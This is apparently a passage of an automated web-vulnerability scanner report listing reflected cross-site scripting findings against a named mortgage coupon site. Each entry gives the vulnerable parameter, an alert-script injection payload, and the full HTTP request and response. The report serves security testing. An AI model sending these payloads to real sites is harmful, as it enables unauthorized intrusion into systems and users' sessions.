The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2239'><script>alert(1)</script>f71a112c65e was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367c8"><script>alert(1)</script>5ab130b97d9 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
1.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /coupon/d544/544003/index4.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8aff'><script>alert(1)</script>47f8bcfe9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?d8aff'><script>alert(1)</script>47f8bcfe9d3=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6199
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
1.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /coupon/d544/544003/index4.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96167"><script>alert(1)</script>32c7c592d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:27 GMT;path=/;httponly
Content-Length: 6199
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76da2"><script>alert(1)</script>5dae8506858 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:53 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6389e'><script>alert(1)</script>e62412c1fab was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:03 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:54 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14188'><script>alert(1)</script>e40d41c94b6 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:42 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30c4"><script>alert(1)</script>c7a08c9e329 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:49 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:41 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365b2"><script>alert(1)</script>3bd7c0702c5 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:59 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... ntactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5');" id="send_btn"> ...[SNIP]...
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31691'><script>alert(1)</script>19c3a704535 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:08 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:45:00 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36d"><script>alert(1)</script>507bab1fa3b was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64696'><script>alert(1)</script>dca245ab55 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:25 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6459
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a414'><script>alert(1)</script>e5878460b3e was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:36 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9e7"><script>alert(1)</script>71945edcd2 was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:35 GMT;path=/;httponly
Content-Length: 6459
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee1d"><script>alert(1)</script>f134721e21d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:33 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:25 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb3a"><script>alert(1)</script>297f12ffdf6 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:12:31 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:22 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
1.156. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://gsbmtg.rtrk.com
Path:
/coupon/d544/544003/index5.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de62"><script>alert(1)</script>2b2bf4c448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
